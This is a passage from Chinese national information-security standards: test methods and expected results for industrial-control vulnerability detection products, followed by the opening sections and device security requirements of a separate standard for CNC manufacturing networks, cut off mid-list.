漏洞检测产品能够记录所发现的已知漏洞。 7.1.3.3 串口协议漏洞检测 用于工业控制的串口协议漏洞检测的测试方法与预期结果如下: a) 测试方法: 1) 漏洞检测产品逐一选取6.1.3 c)中的串口协议; 2) 漏洞检测产品向工业控制设备发送包含串口协议已知漏洞的测试报文。 b) 预期结果: 1) 漏洞检测产品能够支持6.1.3 c)中的串口协议; 2) 漏洞检测产品能通过工业控制设备的响应来发现工业控制设备是否存在的已知漏洞; 3) 漏洞检测产品能够记录所发现的已知漏洞。 7.1.3.4 工业控制私有协议漏洞检测 工业控制私有协议漏洞检测的测试方法与预期结果如下: a) 测试方法: 1) 漏洞检测产品逐一选取所支持的私有协议; 2) 漏洞检测产品向工业控制设备发送包含该协议已知漏洞的测试报文。 b) 预期结果: 1) 漏洞检测产品能通过工业控制设备的响应来发现工业控制设备是否存在的已知漏洞; 2) 漏洞检测产品能够记录所发现的已知漏洞。 7.1.4 工业控制组态软件漏洞检测 工业控制组态软件漏洞检测的测试方法与预期结果如下: a) 测试方法: 在漏洞检测产品上运行针对工业控制组态软件漏洞的测试用例。 b) 预期结果: 1) 漏洞检测产品能通过工业控制设备的响应,来发现工业控制设备是否存在已知工业控制 组态软件漏洞; 2) 漏洞检测产品能够记录所发现的已知漏洞。 7.1.5 工业控制设备操作系统检测 工业控制设备操作系统检测的测试方法与预期结果如下: a) 测试方法: 1) 工业控制设备预置登录弱口令,并开放被测端口; 2) 在漏洞检测产品上运行弱口令测试用例; 3) 在漏洞检测产品上运行操作系统安全漏洞测试用例。 b) 预期结果: 1) 漏洞检测产品能够识别工业控制设备的操作系统类型和版本号; 2) 漏洞检测产品能够检测出登录弱口令; 3) 漏洞检测产品能够检测出并记录工业控制设备操作系统的已知安全漏洞。 7.1.6 工业控制数据库漏洞检测 工业控制数据库漏洞检测的测试方法与预期结果如下: a) 测试方法: 漏洞检测产品向工业控制数据库服务器发送包含数据库已知漏洞的报文。 b) 预期结果: 漏洞检测产品能够检测出并记录工业控制数据库的已知漏洞。 7.1.7 工业控制网络通信设备漏洞检测 工业控制网络通信设备漏洞检测的测试方法与预期结果如下: a) 测试方法: 漏洞检测产品向工业控制网络通信设备发送包含该型号设备已知漏洞的报文。 b) 预期结果: 漏洞检测产品能够检测出并记录工业控制网络通信设备存在的已知漏洞。 7.1.8 漏报测试 漏报测试方法与预期结果如下: a) 测试方法: 1) 选取某型号具有已知安全漏洞的工业控制设备,记录其已知安全漏洞; 2) 使用检测产品对该设备进行漏洞检测; 3) 对比检测报告中列出的安全漏洞和该设备的已知安全漏洞。 b) 预期结果: 如果检测报告中列出的安全漏洞包括该设备的全部已知安全漏洞,则无漏报,否则有漏报。 注:该测试需要对多种类型的工业控制设备进行测试,以保证测试结论的有效性。 7.1.9 误报测试 误报测试方法与预期结果如下: a) 测试方法: 1) 选取某型号具有已知安全漏洞的工业控制设备,记录其已知安全漏洞; 2) 使用漏洞检测产品对该设备进行漏洞检测; 3) 对比检测报告中列出的已知安全漏洞和该设备的已知安全漏洞。 b) 预期结果: 如果检测报告中列出的已知安全漏洞超出该设备的全部已知安全漏洞,或者将 A 漏洞判别为 B 漏洞,则有误报,否则无误报。 注:该测试需要对多种类型的工业控制设备进行测试,以保证测试结论的有效性。 7.1.10 检测结果处理 7.1.10.1 工业控制设备状态监测 工业控制设备状态监测的测试方法与预期结果如下: a) 测试方法: 1) 在漏洞检测产品上运行测试集合; 2) 暂停或者终止测试集合。 b) 预期结果: 1) 能够在漏洞检测产品上实时查看检测进度; 2) 能够在漏洞检测产品上实时查看测试用例每一步骤的执行结果; 3) 能够在漏洞检测产品上监测工业控制设备的实时响应; 4) 能够在漏洞检测产品上随时暂停或者终止测试。 7.1.10.2 检测结果记录 检测结果记录的测试方法与预期结果如下: a) 测试方法: 1) 检查漏洞检测产品是否具有记录检测结果的数据库或数据文件; 2) 检查漏洞检测产品的数据库或数据文件中是否包含导致工业控制设备异常响应的测试 报文。 b) 预期结果: 1) 漏洞检测产品具有记录检测结果的数据库或数据文件; 2) 数据库或数据文件中包含导致工业控制设备异常响应的测试报文。 7.1.10.3 检测报告生成 检测报告生成的测试方法与预期结果如下: a) 测试方法: 1) 查看漏洞检测产品的报告生成功能; 2) 查看报告的生成方式; 3) 查看报告的内容。 b) 预期结果: 1) 漏洞检测产品具有生成报告的功能; 2) 漏洞检测产品提供默认的模板以供快速生成报告; 3) 漏洞检测产品的报告可支持多种图形表格形式,并可生成日报、周报等汇总报告; 4) 漏洞检测产品的报告支持多种文档格式; 5) 漏洞检测产品的报告包括所有检测出的漏洞的名称、类型、编号、漏洞发布日期、漏洞概要 描述等信息; 6) 漏洞检测产品的报告包括对被检测设备的危险等级评估,扫描脆弱点按风险严重程度分 级,并明确标出。 7.1.10.4 检测中断时的报告生成 检测中断时的报告生成的测试方法与预期结果如下: a) 测试方法: 1) 在漏洞检测产品上运行测试集合; 2) 随机终止测试。 b) 预期结果: 终止测试后,漏洞检测产品能生产成已检测部分的报告,并说明测试终止的情况。 7.1.11 管理控制功能 7.1.11.1 检测参数设置 检测参数设置的测试方法与预期结果如下: a) 测试方法: 检查漏洞检测产品是否可以设置检测参数。 b) 预期结果: 漏洞检测产品能够设置检测参数(例如,扫描地址范围、端口范围、漏洞类型、测试报文、测试次 数、测试时间间隔等)。 7.1.11.2 检测方式 检测方式的测试方法与预期结果如下: a) 测试方法: 1) 检查漏洞检测产品是否能够依据工业控制通信协议将测试用例进行归类; 2) 检查漏洞检测产品是否支持测试用例随机组合; 3) 检查漏洞检测产品是否支持测试集合随机组合; 4) 检查漏洞检测产品是否支持用户编写测试用例; 5) 检查漏洞检测产品是否根据设备类型向用户推荐某类或某几类测试用例。 b) 预期结果: 1) 漏洞检测产品能够依据工业控制通信协议将测试用例进行归类; 2) 漏洞检测产品支持测试用例随机组合; 3) 漏洞检测产品支持测试集合随机组合; 4) 漏洞检测产品支持用户编写测试用例; 5) 漏洞检测产品能够根据设备类型向用户推荐某类或某几类测试用例。 7.1.11.3 设备信息库管理 设备信息库管理的测试方法与预期结果如下: a) 测试方法: 1) 检查漏洞检测产品是否具有工业控制设备信息库; 2) 检查漏洞检测产品是否允许用户自定义及增删设备型号; 3) 检查漏洞检测产品是否能够添加新增设备的特征信息。 b) 预期结果: 1) 漏洞检测产品具有工业控制设备信息库; 2) 漏洞检测产品允许用户自定义及增删设备型号; 3) 漏洞检测产品能够添加新增设备的特征信息。 7.1.11.4 漏洞库管理 漏洞库管理的测试方法与预期结果如下: a) 测试方法: 1) 检查漏洞检测产品是否具有漏洞管理库; 2) 检查是否能够在漏洞检测产品中添加新的安全漏洞。 b) 预期结果: 1) 漏洞检测产品具有漏洞管理库; 2) 漏洞检测产品能够添加新的安全漏洞。 7.1.11.5 测试用例库管理 测试用例库管理的测试方法与预期结果如下: a) 测试方法: 1) 检查漏洞检测产品是否具有测试用例库; 2) 检查是否能够修改、增加、删除测试用例或测试集合。 b) 预期结果: 1) 漏洞检测产品具有测试用例库; 2) 库中包含测试用例和测试集合; 3) 检查漏洞检测产品允许用户修改、增加、删除测试用例或测试集合。 7.2 自身安全测试 7.2.1 用户管理与鉴别 7.2.1.1 用户管理 用户管理的测试方法与预期结果如下: a) 测试方法: 1) 检查漏洞检测产品是否具有用户管理功能; 2) 检查漏洞检测产品是否能够为用户设置安全属性。 b) 预期结果: 1) 漏洞检测产品能够添加、删除、激活、禁止用户; 2) 漏洞检测产品能够设置用户的安全属性。 7.2.1.2 用户鉴别 用户鉴别的测试方法与预期结果如下: a) 测试方法: 登录控制台,检查要求进行身份鉴别。 b) 预期结果: 1) 当用户登录对用户进行鉴别,拒绝未通过鉴别的用户登录; 2) 登录之前允许做的操作,仅限于输入登录信息、查看登录帮助等操作; 3) 允许用户在登录后执行与其安全功能相关的各类操作时,不再重复鉴别。 7.2.1.3 鉴别失败处理 鉴别失败处理的测试方法与预期结果如下: a) 测试方法: 1) 检查漏洞检测产品的安全功能是否可定义用户鉴别尝试的最大允许失败次数; 2) 检查漏洞检测产品的安全功能是否可定义当用户鉴别尝试失败连续达到指定次数后,采 取相应的措施、阻止用户进一步的鉴别请求; 3) 尝试多次失败的用户鉴别行为,检查到达指定的鉴别失败次数后,漏洞检测产品是否采取 了相应的措施,并生成了审计事件。 b) 预期结果: 1) 漏洞检测产品具备定义用户鉴别尝试的最大允许失败次数的功能; 2) 当用户鉴别尝试失败连续达到指定次数后,漏洞检测产品能够锁定该账号,并将有关信息 生成审计事件; 3) 最多失败次数仅由授权用户设定。 7.2.1.4 超时设置 超时设置的测试方法与预期结果如下: a) 测试方法: 1) 检查漏洞检测产品是否具有用户登录超时重新鉴别功能; 2) 设定用户登录超时重新鉴别的时间段,检查登录用户在设定的时间段内没有任何操作的 情况下,漏洞检测产品是否锁定或终止了会话,用户是否需要再次进行身份鉴别才能够重 新管理和使用漏洞检测产品。 b) 预期结果: 1) 漏洞检测产品具有登录超时重新鉴别功能; 2) 任何登录用户在设定的时间段内没有任何操作的情况下,应被锁定或终止了会话,管理员 需要再次进行身份鉴别才能够重新管理和使用漏洞检测产品; 3) 最大超时时间仅由授权管理员设定。 7.2.1.5 远程管理 远程管理的测试方法与预期结果如下: a) 测试方法: 1) 通过控制台设置可以进行远程管理的主机地址; 2) 检查是否在执行所有功能之前要求首先进行主机地址; 3) 检查传输过程是否采用了保密性和完整性保护手段。 b) 预期结果: 1) 可以设置远程管理主机地址; 2) 在通过远程主机进行任何与安全功能相关的操作之前都应进行鉴别,拒绝未通过鉴别的 管理请求; 3) 传输过程采用了保密性和完整性保护手段。 7.2.2 产品升级 7.2.2.1 升级功能 升级功能的测试方法与预期结果如下: a) 测试方法: 1) 检查漏洞检测产品的升级方式; 2) 进行产品升级。 b) 预期结果: 1) 可以对漏洞检测产品进行升级; 2) 漏洞检测产品在升级的过程中可以正常工作; 3) 漏洞检测产品在升级后可以正常工作。 7.2.2.2 升级包校验 升级包校验功能的测试方法与预期结果如下: a) 测试方法: 使用经过破坏性修改的升级包进行升级。 b) 预期结果: 漏洞检测产品无法升级并显示将完整性校验结果。 7.2.3 日志管理 7.2.3.1 安全日志生成 安全日志生成的测试方法与预期结果如下: a) 测试方法: 1) 结合开发者文档,使用不同角色管理员模拟对漏洞检测产品进行访问、运行、修改、关闭以 及重复失败尝试等相关操作,检查漏洞检测产品提供了对哪些事件的审计; 2) 审查安全日志的正确性。 b) 预期结果: 1) 漏洞检测产品至少为下述可审计事件产生安全日志:用户登录、用户退出、鉴别失败、设备 重启、安全配置更改等重大事件,产品升级时间和版本号等; 2) 在每条安全日志中至少记录如下信息:事件发生的日期、时间、用户标识、事件类型、事件 描述和结果、远程登录的管理主机的地址。 7.2.3.2 安全日志管理 安全日志管理的测试方法与预期结果如下: a) 测试方法: 1) 模拟授权与非授权管理员访问安全日志,检查是否仅允许授权管理员访问安全日志; 2) 检查是否可以进行日志查询; 3) 检查是否可以修改日志; 4) 检查日志是否能够导出。 b) 预期结果: 1) 除了具有明确的访问权限的授权管理员之外,禁止所有其他用户对安全日志的访问; 2) 提供日志查询功能; 3) 允许授权管理员保存或删除安全日志; 4) 日志能够以通用格式导出。 7.2.4 安全存储 安全存储的测试方法与预期结果如下: a) 测试方法: 1) 用户登录后,尝试读取其他用户创建的测试任务的数据; 2) 用户删除测试任务后,检查是否存在相关的测试数据; 3) 用户导出测试任务数据,用户导入测试任务数据。 b) 预期结果: 1) 用户无法读取其他用户创建的测试任务的数据; 2) 相关的测试数据已被删除; 3) 相关的测试任务数据可以被正确的导入和导出。 7.3 安全保障评估方法 7.3.1 配置管理 7.3.1.1 版本号 版本号的测试方法与预期结果如下: a) 测试方法: 评价者应审查开发者提供的配置管理支持文件是否包含以下内容:版本号,要求开发者所使用 的版本号与所应表示的产品样本完全对应,没有歧义。 b) 预期结果: 审查记录以及最后结果符合测试方法要求,开发者应提供唯一版本号。 7.3.1.2 配置项 配置项的测试方法与预期结果如下: a) 测试方法: 评价者应审查开发者所提供的信息是否满足如下要求: 1) 配置管理功能应对所有的配置项定义唯一的标识。 2) 配置管理文档应包括配置清单、配置管理计划。配置清单用来描述组成系统的配置项。 3) 配置管理文档还应描述对配置项给出唯一标识的方法。 b) 预期结果: 审查记录以及最后结果符合测试方法要求,评价者审查内容至少包括测试方法中的3个方面。 7.3.2 交付与运行 7.3.2.1 交付程序 交付程序的测试方法与预期结果如下: a) 测试方法: 评价者应审查开发者是否使用一定的交付程序交付系统,并使用文档描述交付过程,并且评价 者应审查开发者交付的文档是否包含以下内容:在给用户方交付系统的各版本时,为维护安全 所必需的所有程序。 b) 预期结果: 测试记录以及最后结果符合测试方法要求,开发者应提供完整的文档描述所有交付的过程(文 档和程序交付)。 7.3.2.2 安装、生成和启动程序 安装、生成和启动程序的测试方法与预期结果如下: a) 测试方法: 评价者应审查开发者是否提供了文档说明系统的安装、生成、启动和使用的过程。用户能够通 过此文档了解安装、生成、启动和使用过程。 b) 预期结果: 审查记录以及最后结果符合测试方法要求。 7.3.3 开发 7.3.3.1 功能规范 功能规范的测试方法与预期结果如下: a) 测试方法: 评价者应审查开发者所提供的信息是否满足如下要求: 1) 功能设计应描述产品安全功能与其外部接口; 2) 功能设计应是内在一致的; 3) 功能设计应描述使用所有外部产品安全功能接口的目的与方法,适当的时候,要提供结果 影响例外情况和出错信息的细节; 4) 功能设计应完整地表示产品安全功能; 5) 评价者应确认功能设计是否是系统安全要求的精确和完整的示例。 b) 预期结果: 审查记录以及最后结果符合测试方法要求,评价者审查内容至少包括测试方法中的4个方面。 开发者提供的内容应精确和完整。 7.3.3.2 高层设计 描述性高层设计的测试方法与预期结果如下: a) 测试方法: 评价者应审查开发者所提供的信息是否满足如下要求: 1) 是内在一致的; 2) 按子系统描述安全功能的结构; 3) 描述每个安全功能子系统所提供的安全功能性; 4) 标识安全功能所要求的任何基础性的硬件、固件或软件,以及在这些硬件、固件或软件中 实现的支持性保护机制所提供功能的一个表示; 5) 标识安全功能子系统的所有接口; 6) 标识安全功能子系统的哪些接口是外部可见的。 b) 预期结果: 审查记录以及最后结果符合测试方法要求,评价者审查内容至少包括测试方法中的6个方面。 开发者提供的高层设计内容应精确和完整。 7.3.4 指导性文档 7.3.4.1 管理员指南 管理员指南的测试方法与预期结果如下: a) 测试方法: 评价者应审查开发者是否提供了供授权管理员使用的管理员指南,并且此管理员指南是否包 括如下内容: 1) 产品可以使用的管理功能和接口; 2) 安全地管理产品; 3) 在安全处理环境中应进行控制的功能和权限; 4) 对与产品的安全操作有关的用户行为的假设; 5) 受管理员控制的安全参数,如果可能,应指明安全值; 6) 与管理功能有关的安全相关事件,包括对安全功能所控制的实体的安全特性进行的改变; 7) 与授权管理员有关的 IT 环境的安全要求。 b) 预期结果: 测试记录以及最后结果符合测试方法要求,评价者审查内容至少包括测试方法中的7个方面。 开发者提供的管理员指南应完整。 7.3.4.2 用户指南 用户指南的测试方法与预期结果如下: a) 测试方法: 评价者应审查开发者是否提供了供系统用户使用的用户指南,并且此用户指南是否包括如下 内容: 1) 产品的非管理用户可使用的安全功能和接口; 2) 产品提供给用户的安全功能和接口的用法; 3) 用户可获取但应受安全处理环境控制的所有功能和权限; 4) 产品安全操作中用户所应承担的职责; 5) 与用户有关的 IT 环境的所有安全要求。 b) 预期结果: 测试记录以及最后结果符合测试方法要求,评价者审查内容至少包括测试方法中的5个方面。 开发者提供的用户指南应完整。 7.3.5 测试 7.3.5.1 测试覆盖 测试覆盖的测试方法与预期结果如下: a) 测试方法: 评价者应审查开发者提供的测试覆盖证据,在测试覆盖证据中,是否表明测试文档中所标识的 测试与功能规范中所描述的系统的安全功能是对应的。 b) 预期结果: 审查记录以及最后结果符合测试方法要求,开发者提供的测试覆盖证据,应表明测试文档中所 标识的测试与功能规范中所描述的系统的安全功能是对应的。 7.3.5.2 功能测试 功能测试的测试方法与预期结果如下: a) 测试方法: 1) 评价开发者提供的测试文档,是否包括测试计划、测试规程、预期的测试结果和实际测试 结果; 2) 评价测试计划是否标识了要测试的安全功能,是否描述了测试的目标; 3) 评价测试规程是否标识了要执行的测试,是否描述了每个安全功能的测试概况(这些概况 包括对其他测试结果的顺序依赖性); 4) 评价期望的测试结果是否表明测试成功后的预期输出; 5) 评价实际测试结果是否表明每个被测试的安全功能能按照规定进行运作。 b) 预期结果: 测试记录以及最后结果符合测试方法要求,评价者审查内容至少包括测试方法中的5个方面。 开发者提供的内容应完整。
standards
信息安全技术 数控网络安全技术要求 Information security technology— Security technique requirements for numerical control network 信息安全技术 数控网络安全技术要求 1 范 围 本标准提出了数字化工厂或数字化车间的数控网络安全防护原则,规定了数控网络的安全技术要 求,包括设备安全技术要求、网络安全技术要求、应用安全技术要求和数据安全技术要求。 本标准适用于数控网络安全防护的规划、设计和检查评估。 2 规范性引用文件 下列文件对于本文件的应用是必不可少的。凡是注日期的引用文件,仅注日期的版本适用于本文 件。凡是不注日期的引用文件,其最新版本(包括所有的修改单)适用于本文件。 GB/T 25069—2010 信息安全技术 术语 3 术语和定义 GB/T 25069—2010 界定的以及下列术语和定义适用于本文件。 3.1 数控设备 numerical control equipment 按预先编制的程序,由控制系统发出数字信息指令对工作过程进行控制的设备。 注1:改写GB/T6477—2008, 定义2.1.26。 注2:常见的数控设备有:数控机床、数控切割机、三坐标测量仪等。 3.2 数控系统 numerical control system 数控设备上使用数值数据的控制系统,在运行过程中,不断地引入数值数据,从而实现设备工作过 程的自动化控制。 注:改写GB/T 26220—2010,定义3.1。 3.3 数控代码 numerical control code 用于控制数控设备运作的指令集。 3.4 数控网络 numerical control network 由数字控制服务器、采集服务器、数控设备和网络通信设备等构成的网络。 注:在数控网络中实现了数控设备的集中控制,以及数字控制服务器、采集服务器和数控设备之间的控制指令及设 备状态信息的传输。 3.5 区域 zone 共享相同信息安全要求的逻辑资产或物理资产的集合。 注:区域具有清晰的边界。 一个信息安全区域的信息安全策略在其内部和边界都要强制执行。 [GB/T 35673—2017,定义3.1.47] 4 缩略语 下列缩略语适用于本文件。 CAD: 计算机辅助设计(Computer Aided Design) CAM: 计算机辅助制造(Computer Aided Manufacturing) CAPP: 计算机辅助工艺过程设计(Computer Aided Process Planning) CPU: 中央处理器(Central Processing Unit) DMZ:非军事区(De-Militarized Zone) IP: 因特网协议(Internet Protocol) MES: 制造执行系统(Manufacturing Execution System) NC:数字控制(Numerical Control) PDM: 产品数据管理(Product Data Management) USB: 通用串行总线(Universal Serial Bus) VLAN: 虚拟局域网(Virtual Local Area Network) 5 概述 5.1 数控网络安全框架 数控网络由数字控制服务器(即 NC 服务器)、采集服务器、数控设备、网络通信设备等组成。数控 网络的参考模型参见附录A 。 设备(数控设备、采集服务器、NC 服务器、网络通信设备)、设备上安装运 行的操作系统、应用软件和存储的数据以及设备间的通信(有线、无线)是本标准所涵盖的保护对象。 数控网络面临的信息安全风险参见附录 B。针对数控网络面临的安全风险和面对的保护对象,本 标准提出了数控网络安全框架,如图1所示。本标准的第6章、第7章、第8章、第9章基于安全框架和 5.2 中的数控网络安全防护原则分别对各项提出具体的安全技术要求 数控网络信息安全防护原则 数控网络信息安全防护应遵循以下原则: a) 网络可用 各类安全防护措施的使用不应对数控网络的正常运行以及数控网络与外部网络的交互造成 影响。 b) 网络隔离 数控网络应仅用于数控生产加工业务,应采用专用的物理网络,与外部网络的交互应采取有效 的安全防护措施。 c) 分区防御 应将数控网络划分为数控网络-监督控制区域和数控网络-数控设备区域。数控网络-数控设备 区域按照生产功能可进一步划分为不同的子区域。对不同的区域应根据安全要求采取安全保 护措施。在不影响各区域工作的前提下,应于各区域边界处采取安全隔离措施,确保各个区域 之间有清楚明晰的边界设定,并保障各区域边界安全。 d) 全面保护 数控网络的安全防护可通过物理访问控制措施、管理措施以及技术措施实现。单一设备的防 护、单一防护措施或单一防护产品的使用无法有效的保护数控网络,数控网络的防护应采取多 种安全机制和多层防护策略。 注:物理访问控制措施参见GB/T 22239中的要求。 5.3 安全技术要求 本标准提出了设备安全技术要求、网络安全技术要求、应用安全技术要求、数据安全技术要求和集 中管控技术要求。 设备安全技术要求对数控网络中采集服务器上的操作系统,NC 服务器上的操作系统、数据库系 统,数控设备上数控系统的操作系统以及数控网络中的网络通信设备从身份鉴别、访问控制、入侵防范、 资源控制、恶意代码防范、安全审计等方面进行了规定。 网络安全技术要求从网络架构、数控网络与管理网络以及数控网络内部不同安全区域之间的边界 防护、访问控制、入侵防范、安全审计以及数控网络中无线网络的使用控制等方面进行了规定。 应用安全技术要求对采集服务器、NC 服务器、数控设备上数控系统安装的各类应用软件从身份鉴 别、访问控制、资源控制、软件容错、安全审计等方面进行了规定。 数据安全技术要求对设备上存储的 NC 代码、工艺文件、审计记录等及设备之间传输的 NC 代码、 设备状态信息等数据从数据完整性、数据保密性、数据备份恢复、剩余信息保护等方面进行了规定,应根 据业务类型对数控网络的业务敏感数据进行分级并采取相应的保护措施。 集中管控技术要求对数控网络中由安全设备及安全组件实现的各类安全机制的集中管理进行了 规定。 5.4 安全技术要求分级 本标准按照数控网络对安全防护能力的需求将各类要求分为基本要求和增强要求。增强要求是对 基本要求的补充和加强。 6 设备安全技术要求 6.1 NC 服务器和采集服务器安全技术要求 6.1.1 身份鉴别 6.1.1.1 基本要求 基本要求包括: a) 应能够唯一地标识和鉴别登录 NC 服务器操作系统、采集服务器操作系统和 NC 服务器数据 库系统的用户; b) 应能够通过设置最小长度和多种字符类型以达到强制配置 NC 服务器操作系统、采集服务器 操作系统和 NC 服务器数据库系统的用户口令强度; c) 应通过加密方式存储用户的口令; d) 应对连续无效的访问尝试设置阈值,在规定的时间周期内,对 NC 服务器操作系统、采集服务 器操作系统和 NC 服务器数据库系统的访问尝试次数超出阈值时,应能够进行告警并进行锁 定直到管理员解锁。 6.1.1.2 增强要求 增强要求包括: a) 应防止 NC 服务器操作系统、采集服务器操作系统和 NC 服务器数据库系统任何已有的用户 账号重复使用同一口令; b) 应具有登录失败处理功能,采取结束会话、登录连接超时自动退出等措施; c) 应能够唯一地标识所有设备; d) 应限制用户口令的最长和最短有效期; e) 应能够隐藏鉴别过程中的鉴别信息反馈; f) 应提供两种或两种以上的鉴别技术来进行身份鉴别,其中至少有一种身份鉴别信息是不可伪 造的。 6.1.2 访问控制 6.1.2.1 基本要求 基本要求包括: a) 应对登录 NC 服务器、采集服务器操作系统和 NC 服务器数据库系统的用户分配账号和权限, 根据用户的角色仅授予用户所需的最小权限。 b) 应支持 NC 服务器、采集服务器操作系统和NC 服务器数据库系统的授权用户管理所有账号, 包括添加、激活、修改、禁用和删除账号。 c) 应支持重命名 NC 服务器、采集服务器操作系统和NC 服务器数据库系统的默认账号和修改 默认账号的默认口令。 d) 应支持删除或禁用NC 服务器、采集服务器操作系统和 NC 服务器数据库系统多余的、过期的 账号,避免存在共享账号。 e) 应能够配置非活动时间周期,对 NC 服务器、采集服务器操作系统和 NC 服务器数据库系统的 用户,应在安全策略规定的非活动时间周期后自动启动或通过手动启动会话锁定防止进一步 访问。会话锁定应一直保持有效,直到发起会话的人员或其他授权人员使用适当的身份标识 和鉴别重新建立访问。 f) 应支持 NC 服务器、采集服务器操作系统和 NC 服务器数据库系统的授权用户或角色对所有 用户的权限映射进行规定和修改。 6.1.2.2 增强要求 增强要求包括: a) 应能够对访问NC 服务器的采集服务器进行操作超时设置,在超时后自动锁定; b) 应支持授权人员配置访问控制策略,访问控制策略规定用户对资源的访问规则; c) 访问控制的粒度应达到访问主体为用户或软件进程,可访问的资源为文件、数据库表; d) 应对 NC 代码、用户鉴别信息等重要信息资源设置敏感标记,应依据安全策略严格控制用户对 有敏感标记的重要信息资源进行操作。 6.1.3 入侵防范 6.1.3.1 基本要求 基本要求包括: a) 采集服务器、NC 服务器的操作系统应采用最小化安装原则,只安装必要的组件和应用软件; b) 应明确阻止或限制使用采集服务器、NC 服务器的 USB 等外设端口和无线功能; c) 不准许未授权的移动设备连接采集服务器或 NC 服务器,不准许授权移动设备进行超越其权 限的操作; d) 不准许通过即时消息通信系统与数控网络外的用户或系统通信; e) 应关闭不需要的系统服务、默认共享和端口。 6.1.3.2 增强要求 增强要求包括: a) 应仅允许授权的采集服务器访问 NC 服务器、仅允许授权的移动设备访问采集服务器、NC 服 务器; b) 应在经过充分测试评估后及时修补采集服务器、NC 服务器操作系统存在的漏洞,漏洞的修补 不应影响正常的生产。 注:为保证生产的正常进行,可在计划的或非计划的系统维护期间进行漏洞修补的测试及漏洞修补。 6.1.4 资源控制 6.1.4.1 基本要求 基本要求包括: a) 应按照供应商提供的指南中所推荐的网络和安全配置进行设置; b) 应对设备的运行资源进行监视,包括但不限于CPU、硬盘、内存等资源的使用情况; c) 应提供 NC 服务器和工业交换机的硬件冗余,保证系统的可用性。 6.1.4.2 增强要求 增强要求包括: a) 应能够对设备的资源使用情况设置阈值,当达到阈值时进行告警; b) 应能够对设备的接口限制并发会话数量,并且会话数量可配置; c) 应能够对设备当前的安全配置生成一个列表。 6.1.5 恶意代码防范 6.1.5.1 基本要求 基本要求包括: a) 应在采集服务器、NC 服务器部署恶意代码防护机制以达到防恶意代码的目的; b) 采集服务器、NC 服务器恶意代码的防护不应改变系统的配置、读取敏感信息、消耗大量系统 资源或影响系统的可用性; c) 应在采集服务器、NC 服务器上限制使用可能造成损害的移动代码技术,包括但不限于防止移 动代码的执行、对移动代码的源进行鉴别和授权、监视移动代码的使用; 注 1 :移动代码指的是 Java 、JavaScript 、ActiveX 等程序或插件。 d) 采集服务器、NC 服务器上恶意代码的防护机制应定期进行升级,恶意代码防护机制的升级不 应影响正常的生产且升级内容应经过充分的测试。 注2:为保证生产的正常进行,可在计划的或非计划的系统维护期间进行恶意代码防护机制的升级及测试。 6.1.5.2 增强要求 增强要求包括: a) 应在移动代码执行之前对移动代码的完整性进行检查; b) 在更新恶意代码库、木马库以及规则库前,应首先在测试环境中测试通过,对隔离区域恶意代 码更新应有专人负责,更新操作应离线进行,并保存更新记录。 6.1.6 安全审计 6.1.6.1 基本要求 基本要求包括: a) 应对包括但不限于用户登录操作系统、对 NC 代码的访问、NC 代码传输、请求错误、备份和恢 复、配置改变等安全事件进行审计; b) 审计记录应包括但不限于时间戳、来源、类别、事件标识和事件结果等; c) 设备应设置足够的审计记录存储容量; d) 应通过权限控制、加密存储等对设备的审计记录进行保护; e) 在审计记录生成时,设备应提供时间戳; f) 应定期备份审计记录,避免受到未预期的删除、修改或覆盖等而丢失审计信息; g) 应能够对时钟同步频率进行配置,按照设定的频率进行系统时钟同步。 6.1.6.2 增强要求 增强要求包括: a) 在审计失败时,包括但不限于软件或硬件出错、审计捕获机制失败、审计存储容量饱和或溢出, 应能够进行告警并能够采取恰当的措施(如覆盖最早的审计记录或停止审计日志生成); b) 应能够配置审计存储容量的阈值,当审计记录存储值达到审计存储容量的阈值时应能够进行 告警; c) 应能够把审计记录写入非易失性存储介质; d) 应能够为集中审计管理提供接口,将自身生成的审计记录上传; e) 应能够通过编程访问审计记录。 6.2 数控设备安全技术要求 6.2.1 身份鉴别 6.2.1.1 基本要求 基本要求包括: a) 应能够唯一地标识和鉴别登录数控设备操作系统的用户; b) 应能够对数控设备操作系统的用户组、角色进行唯一标识; c) 应能够通过设置最小长度和多种字符类型以达到强制配置数控设备口令强度; d) 应通过加密方式存储用户的口令; e) 应对数控设备操作系统用户在规定的时间周期内,对连续无效的访问尝试次数设置阈值,当访 问尝试次数达到阈值时,应能进行告警并在规定的时间内进行锁定或者直到管理员解锁。 6.2.1.2 增强要求 增强要求包括: a) 应防止数控设备操作系统任何已有的用户账号重复使用同一口令; b) 应能够唯一地标识所有设备; c) 应限制用户口令的最长和最短有效期; d) 应能够隐藏鉴别过程中的鉴别信息反馈; e) 应提供两种或两种以上的鉴别技术来进行身份鉴别,其中至少有一种身份鉴别信息是不可伪 造的。 注:对于无法支持部署身份鉴别措施的设备,可通过物理访问控制等方式提供补偿控制措施。 6.2.2 访问控制 6.2.2.1 基本要求 基本要求包括: a) 应对登录数控设备操作系统用户分配账号和权限,遵循职责分离原则,根据用户的角色仅授予 用户所需的最小权限。 b) 应支持数控设备操作系统授权用户管理所有账号,包括添加、激活、修改、禁用和删除账号。 c) 应支持重命名数控设备操作系统默认账号或修改默认账号的默认口令。 d) 应支持删除或禁用数控设备操作系统多余的、过期的账号,避免共享账号的存在。 e) 应支持配置非活动时间,超过非活动时间后,数控设备操作系统用户应自动启动或通过手动启 动会话锁定防止进一步访问。会话锁定应一直保持有效,直到拥有会话的人员或其他授权人 员使用适当的身份标识和鉴别重新建立访问。 f) 应支持数控设备操作系统授权用户或角色对所有用户的权限映射进行规定和修改。 6.2.2.2 增强要求 增强要求包括: a) 应支持授权人员配置访问控制策略,访问控制策略规定用户对资源的访问规则; b) 应对 NC 代码、用户鉴别信息等重要信息资源设置敏感标记,应依据安全策略严格控制用户对 有敏感标记的重要信息资源进行操作。 注:对于无法支持部署访问控制措施的设备,可通过物理访问控制、人员管理等提供相应的补偿控制措施。 6.2.3 入侵防范 6.2.3.1 基本要求 基本要求包括: a) 数控设备的操作系统应采用最小化安装原则,只安装必要的组件和应用软件; b) 应明确阻止或限制使用数控设备的 USB 等外设端口和无线功能; c) 不准许未授权的移动设备连接数控设备,不准许授权移动设备进行超越其权限的操作。 6.2.3.2 增强要求 增强要求包括: a) 应仅允许授权的移动设备访问数控设备; b) 应及时进行升级修补数控设备存在的漏洞,补丁升级应满足功能和版本的基础要求,数控设备 的升级不应影响正常的生产。 注:为保证生产的正常进行,可在计划的或非计划的系统维护期间进行漏洞修补的测试及漏洞修补。 6.2.4 安全审计 6.2.4.1 基本要求 基本要求包括: a) 应对包括但不限于用户登录操作系统、对 NC 代码的访问、NC 代码传输、请求错误、备份和恢 复、配置改变等安全事件进行审计; b) 